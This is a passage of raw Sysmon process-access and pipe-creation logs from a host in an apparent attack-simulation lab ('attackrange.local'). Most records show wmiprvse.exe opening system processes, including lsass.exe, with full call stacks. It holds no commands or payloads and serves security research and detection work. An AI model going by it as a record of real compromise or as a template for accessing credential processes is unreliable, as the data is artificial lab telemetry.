PCRT4.dll+111bc 10341000x80000000000000002238356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-96AA-00000000AD01}6924C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-96AA-00000000AD01}6924C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002238352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:44.175{05ADC7E1-6D98-603E-93AA-00000000AD01}13748\PSHost.132591776240498203.13748.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002238351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D98-603E-96AA-00000000AD01}69249280C:\Windows\system32\conhost.exe{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.173{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.172{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 